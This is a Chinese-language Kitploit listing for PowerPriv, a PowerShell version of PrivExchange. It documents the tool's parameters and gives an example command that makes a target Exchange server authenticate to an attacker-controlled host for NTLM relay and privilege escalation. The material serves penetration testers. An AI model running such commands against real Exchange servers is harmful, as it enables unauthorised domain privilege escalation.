Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/g0ldengunsec/powerpriv
权限提升漏洞利用横向移动渗透测试身份验证
GitHubg0ldengunsec/powerpriv

PowerPriv

一款 PowerShell 实现的 PrivExchange,设计为在当前用户上下文中运行

查看仓库
125247年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PowerPriv

描述

一个基于 @_dirkjan 的 PrivExchange 的 PowerShell 实现(原始代码见:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) 适用于无法运行基于 Python 的应用程序、拥有用户凭据或不想将文件释放到磁盘的环境。该工具将使目标 Exchange 服务器的系统账户尝试向您选择的系统进行身份验证。

-targetHost

目标 Exchange 服务器的主机名或 IP。根据 DNS 配置,使用主机名时可能需要 FQDN。(必需)

-attackerHost

您控制的系统的主机名或 IP,最好在此系统上运行 ntlmrelayx。我们告诉 Exchange 服务器尝试向该系统进行身份验证。根据 DNS 配置,使用主机名时可能需要 FQDN。(必需)

-exchangePort

尝试连接 Exchange 服务器的端口。默认为 443。

-attackerPort

Exchange 应尝试回连到攻击者系统的端口。默认为 80。

-attackerPage

我们告诉 Exchange 服务器在我们的攻击系统上连接的页面。不需要斜杠。默认为 powerPriv。

-noSSL

如果不想在初始连接 Exchange 服务器时使用 https,则设置为 true。默认为 false(使用 https)。

-Version

目标 Exchange 服务器的版本。默认为 2013。

示例

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

备注

root@kitploit:~
作者:@g0ldenGunSec - 基于 @_dirkjan 创建的工具
请仅在您拥有或获得测试许可的网络中使用此工具。
下载工具